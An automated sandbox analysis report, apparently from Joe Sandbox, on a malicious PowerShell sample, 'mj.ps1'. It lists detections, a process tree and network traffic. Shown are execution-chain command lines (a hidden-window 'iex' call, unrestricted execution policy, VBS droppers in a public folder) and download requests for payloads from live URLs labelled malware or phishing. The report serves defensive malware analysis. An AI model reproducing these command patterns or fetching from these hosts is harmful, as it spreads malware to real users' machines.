
Windows Analysis Report
mj.ps1

Overview

General Information

Sample name: mj.ps1
Analysis ID: 1569000
MD5: 60d7208fe8e8ac62c560b76fcf8a3bce
SHA1: 50220e1eed46cd7cce80a8f1e4aaf38619a6f2c7
SHA256: 42306fd8ea8eea5b9eddb11782f5eb51d69eebfd63da36f2b03d749e649e3939
Tags: Listofrequireditems, ps1, user-JAMESWT_MHT

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Loading BitLocker PowerShell Module
Obfuscated command line found
Powershell creates an autostart link
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Scan Loop Network
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

  • System is w10x64
  • powershell.exe (PID: 7700 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mj.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8124 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f170vy.vbs'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • wscript.exe (PID: 6768 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\p2q.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • powershell.exe (PID: 832 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [long obfuscated PowerShell command line omitted] MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7588 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: powershell.exe PID: 7700 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: powershell.exe PID: 832 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

Source | Rule | Description | Author | Strings
amsi64_7700.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi64_832.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\p2q.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\p2q.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mj.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7700, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\p2q.vbs" , ProcessId: 6768, ProcessName: wscript.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\p2q.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\p2q.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mj.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7700, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\p2q.vbs" , ProcessId: 6768, ProcessName: wscript.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f170vy.vbs'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f170vy.vbs'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mj.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7700, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f170vy.vbs'", ProcessId: 8124, ProcessName: powershell.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\p2q.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\p2q.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mj.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7700, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\p2q.vbs" , ProcessId: 6768, ProcessName: wscript.exe
Source: File created | Author: Florian Roth (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7700, TargetFilename: C:\Users\Public\p2q.vbs
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mj.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mj.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mj.ps1", ProcessId: 7700, ProcessName: powershell.exe
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7700, TargetFilename: C:\Users\Public\p2q.vbs
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [long obfuscated PowerShell command line omitted]
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\p2q.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\p2q.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mj.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7700, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\p2q.vbs" , ProcessId: 6768, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mj.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mj.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mj.ps1", ProcessId: 7700, ProcessName: powershell.exe
No Suricata rule has matched

AV Detection

Source: mj.ps1 | Avira: detected
Source: https://www.erp-royal-crown.info/wh/Subordinerende | Avira URL Cloud: Label: phishing
Source: https://www.erp-royal-crown.info/wh/Subordineren | Avira URL Cloud: Label: phishing
Source: https://www.erp-royal-crown.info/wh/Subordinerend | Avira URL Cloud: Label: phishing
Source: http://www.erp-royal-crown.info | Avira URL Cloud: Label: phishing
Source: https://www.erp-royal-crown.info/wh/Subordine | Avira URL Cloud: Label: phishing
Source: https://www.erp-royal-crown.info | Avira URL Cloud: Label: phishing
Source: https://www.pineappletech.ae/na/mg.vbs | Avira URL Cloud: Label: malware
Source: https://www.erp-royal-crown.info/wh/ | Avira URL Cloud: Label: phishing
Source: https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdf | Avira URL Cloud: Label: malware
Source: https://www.erp-royal-crown.info/wh/Subord | Avira URL Cloud: Label: phishing
Source: https://www.erp-royal-crown.info/w | Avira URL Cloud: Label: phishing
Source: https://www.erp-royal-crown.info/wh/Subordinerendes78.smi | Avira URL Cloud: Label: malware
Source: https://www.almrwad.com/wh/Subordinerendes78.smi | Avira URL Cloud: Label: malware
Source: https://www.erp-royal-crown.info/wh/Subordinere | Avira URL Cloud: Label: phishing
Source: https://www.erp-royal-crown.info/wh | Avira URL Cloud: Label: phishing
Source: https://www.erp-royal-crown.info/wh/Subordi | Avira URL Cloud: Label: phishing
Source: https://www.erp-royal-crown.info/wh/Subor | Avira URL Cloud: Label: phishing
Source: https://www.erp-royal-crown.info/wh/Subo | Avira URL Cloud: Label: phishing
Source: http://erp-royal-crown.info | Avira URL Cloud: Label: phishing
Source: https://www.erp-royal-crown.info/wh/Subordinerendes | Avira URL Cloud: Label: phishing
Source: https://www.erp-royal-crown.info/wh/Subordinerendes78.s | Avira URL Cloud: Label: phishing
Source: https://www.erp-royal-crown.info/wh/Subordin | Avira URL Cloud: Label: phishing
Source: https://www.erp-royal-crown.info/wh/Subordinerendes78 | Avira URL Cloud: Label: phishing
Source: https://www.erp-royal-crown.info/wh/Subordinerendes7 | Avira URL Cloud: Label: phishing
Source: https://www.erp-royal-crown.info/ | Avira URL Cloud: Label: phishing
Source: https://www.erp-royal-crown.info/wh/Sub | Avira URL Cloud: Label: phishing
Source: mj.ps1 | ReversingLabs: Detection: 31%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 96.7% probability
Source: unknown | HTTPS traffic detected: 93.95.216.175:443 -> 192.168.2.11:49728 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 91.193.42.13:443 -> 192.168.2.11:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 184.171.244.231:443 -> 192.168.2.11:49748 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 148.251.114.233:443 -> 192.168.2.11:49777 version: TLS 1.2
          Source: Binary string: mscorlib.pdb source: powershell.exe, 00000001.00000002.1512989035.000002CDAA82B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1401973851.000001D46676B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Un.pdb[(r source: powershell.exe, 00000004.00000002.1400620214.000001D466690000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: pdblib.pdb source: powershell.exe, 00000001.00000002.1582637126.000002CDC2CFB000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: bpdbtem.pdb source: powershell.exe, 00000001.00000002.1512989035.000002CDAA800000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000008.00000002.2678462798.000001336A368000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdb source: powershell.exe, 00000008.00000002.2678462798.000001336A356000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1401973851.000001D46676B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.2675286463.000001336A183000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1399165537.000001D466470000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.2675286463.000001336A183000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32? source: powershell.exe, 00000004.00000002.1399165537.000001D466470000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.pdbL. source: powershell.exe, 00000008.00000002.2678462798.000001336A368000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbD source: powershell.exe, 00000004.00000002.1402547814.000001D4667F8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: CallSite.Target.pdbe35 source: powershell.exe, 00000001.00000002.1582637126.000002CDC2CC2000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdbk source: powershell.exe, 00000008.00000002.2678462798.000001336A356000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: *on.pdb source: powershell.exe, 00000004.00000002.1401973851.000001D46676B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdbM source: powershell.exe, 00000008.00000002.2680246932.000001336A3E0000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Software Vulnerabilities

          Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: global trafficHTTP traffic detected: GET /wh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.fornid.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /na/mg.vbs HTTP/1.1Host: www.pineappletech.aeConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 148.251.114.233
Source: Joe Sandbox View | ASN Name: SERVERPLAN-ASIT
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: www.almrwad.com | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /wh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1 | Host: www.fornid.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /na/mg.vbs HTTP/1.1 | Host: www.pineappletech.ae | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: www.almrwad.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.almrwad.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1 | Host: www.erp-royal-crown.info | Connection: Keep-Alive
Source: powershell.exe, 00000001.00000002.1514726032.000002CDAC515000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: src="https://www.facebook.com/tr?id=&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
Source: global traffic | DNS traffic detected: DNS query: www.fornid.com
Source: global traffic | DNS traffic detected: DNS query: www.pineappletech.ae
Source: global traffic | DNS traffic detected: DNS query: www.almrwad.com
Source: global traffic | DNS traffic detected: DNS query: www.erp-royal-crown.info
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:39:27 GMT | Server: Apache | P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" | Set-Cookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=rMDVJJyqzbUxb1uFCvyisk3G4cITOWZG4GuazMsJ3UP4fxnTX%2FMSpEfZIoqrX%2BXqP6DO2Fqc%2BBFZkXxuDpMJZAgCA9dZBWoLjZLevxRYylY%3D000075; expires=Wed, 25-Dec-2024 09:39:27 GMT; Max-Age=1727999; path=/; domain=www.fornid.com; httponly | Upgrade: h2,h2c | Connection: Upgrade, close | Vary: Accept-Encoding | Transfer-Encoding: chunked | Content-Type: text/html; charset=utf-8
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:39:35 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:39:41 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:39:47 GMT | server: LiteSpeed
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:39:53 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:39:58 GMT | server: LiteSpeed
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:40:04 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:40:10 GMT | server: LiteSpeed
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:40:16 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:40:22 GMT | server: LiteSpeed
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:40:28 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:40:34 GMT | server: LiteSpeed
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:40:40 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:40:46 GMT | server: LiteSpeed
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:40:52 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:40:57 GMT | server: LiteSpeed
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:41:03 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Thu, 05 Dec 2024 09:41:09 GMT | server: LiteSpeed
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 05 Dec 2024 09:41:15 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
